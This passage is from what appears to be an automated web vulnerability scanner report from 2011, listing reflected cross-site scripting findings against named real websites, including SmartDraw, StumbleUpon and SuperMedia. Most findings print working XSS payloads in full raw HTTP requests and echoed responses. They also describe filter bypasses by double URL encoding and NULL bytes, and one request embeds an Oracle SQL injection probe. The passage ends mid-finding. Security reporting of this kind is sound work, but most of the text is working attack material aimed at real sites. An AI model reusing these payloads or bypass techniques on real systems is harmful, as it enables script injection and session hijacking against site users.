GET /videos/demo/x22551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gtu5y445d4j1giqdn4l3bg55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/x22551b7"style="x:expression(alert(1))"8d874867177/" rel="nofollow" target="_blank">
...[SNIP]...

1.218. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d was submitted in the REST URL parameter 3. This input was echoed as bd314"style="x:expression(alert(1))"9639797b41d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=w11nlueclbe1ry55ysywmpry; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/bd314"style="x:expression(alert(1))"9639797b41d/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.219. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 436c4"style="x:expression(alert(1))"7d96edb3e1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /videos/demo/x22?436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sxjxsy55v4wrlmeet1lslx45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8809
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/x22/?436c4"style="x:expression(alert(1))"7d96edb3e1d=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.220. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e581f"style="x:expression(alert(1))"3b6d10c18aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /videos/demo/x22?e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qlfc4j452c3dom55lvonz145; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8809
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/x22/?e581f"style="x:expression(alert(1))"3b6d10c18aa=1" rel="nofollow" target="_blank">
...[SNIP]...

1.221. http://www.smartdraw.com/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e was submitted in the REST URL parameter 1. This input was echoed as 2d4c3"style="x:expression(alert(1))"a464241924e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /x222d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xxiaal45scvt05rw0scrir55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8704
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/x222d4c3"style="x:expression(alert(1))"a464241924e/" rel="nofollow" target="_blank">
...[SNIP]...

1.222. http://www.smartdraw.com/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a was submitted in the REST URL parameter 1. This input was echoed as 9bd6e"style="x:expression(alert(1))"b4a37af963a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4s50qr0kvr4fhux3xpku555; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8683
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/9bd6e"style="x:expression(alert(1))"b4a37af963a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.223. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73ce3"style="x:expression(alert(1))"57e4b8b7737 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /x22?73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4rkbbezripwlcr04310bhix; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8725
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/x22/?73ce3"style="x:expression(alert(1))"57e4b8b7737=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.224. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db50c"style%3d"x%3aexpression(alert(1))"751e53b85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db50c"style="x:expression(alert(1))"751e53b85e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /x22?db50c"style%3d"x%3aexpression(alert(1))"751e53b85e=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:39 GMT
Content-Length: 8718
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: ASP.NET_SessionId=f0nhyr451wf2n5ul5fkcv5fi; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/x22/?db50c"style="x:expression(alert(1))"751e53b85e=1" rel="nofollow" target="_blank">
...[SNIP]...

1.225. http://www.stumbleupon.com/submit [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c0ad"style%3d"x%3aexpression(alert(1))"f42279855ae was submitted in the url parameter. This input was echoed as 4c0ad"style="x:expression(alert(1))"f42279855ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j84c0ad"style%3d"x%3aexpression(alert(1))"f42279855ae&title=Magadheera+SmartDesis.TK.mp4 HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=974qehta1h4k26lmf15gse6pi7; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=12468690794d4b1cfaee50a2.12040146; expires=Sat, 05-Mar-2011 21:24:10 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 05-Mar-2011 21:24:10 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 05-Mar-2011 21:24:10 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=1a24d7caf7602edb84b771b2d98b4b47%7C%7C10%7C%7C1296768250%7C003b4cc581adee0f1d9ec8caa710ca6d; expires=Sun, 31-Jan-2021 21:24:10 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 49230
Date: Thu, 03 Feb 2011 21:24:11 GMT
X-Varnish: 508021037
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j84c0ad"style="x:expression(alert(1))"f42279855ae" />
...[SNIP]...

1.226. https://www.supermedia.com/spportal/spportalFlow.do ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the '"--></style></script><script>alert(0x000043)</script> request parameter is copied into the HTML document as plain text between tags. The payload 8e1ef<script>alert(1)</script>559c076520b was submitted in the '"--></style></script><script>alert(0x000043)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /spportal/spportalFlow.do?'"--></style></script><script>alert(0x000043)</script>8e1ef<script>alert(1)</script>559c076520b HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; trafficSource=default; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b; mbox=check#true#1296759729|session#1296759634912-2644#1296761529; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Host: www.supermedia.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:40 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20453


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
</script>8e1ef<script>alert(1)</script>559c076520b' ->
...[SNIP]...

1.227. https://www.supermedia.com/spportal/spportalFlow.do [_flowExecutionKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the _flowExecutionKey request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00e6"%3balert(1)//a43b114193b was submitted in the _flowExecutionKey parameter. This input was echoed as b00e6";alert(1)//a43b114193b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=b00e6"%3balert(1)//a43b114193b HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761536|check#true#1296759736; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:05:37 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20044


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
;
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key 'b00e6";alert(1)//a43b114193b', the expected format is '_c<conversationId>
...[SNIP]...

1.228. https://www.supermedia.com/spportal/spportalFlow.do [_flowExecutionKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the _flowExecutionKey request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00354d0"%3bbf98880f27f was submitted in the _flowExecutionKey parameter. This input was echoed as 354d0";bf98880f27f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27%00354d0"%3bbf98880f27f HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761712|check#true#1296759912; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:07:54 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20354


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
op7="Badly formatted flow execution key ''||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||'.354d0";bf98880f27f', the expected format is '_c<conversationId>
...[SNIP]...

1.229. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the _flowId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a5103"%3bb8f83f9f764 was submitted in the _flowId parameter. This input was echoed as a5103";b8f83f9f764 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

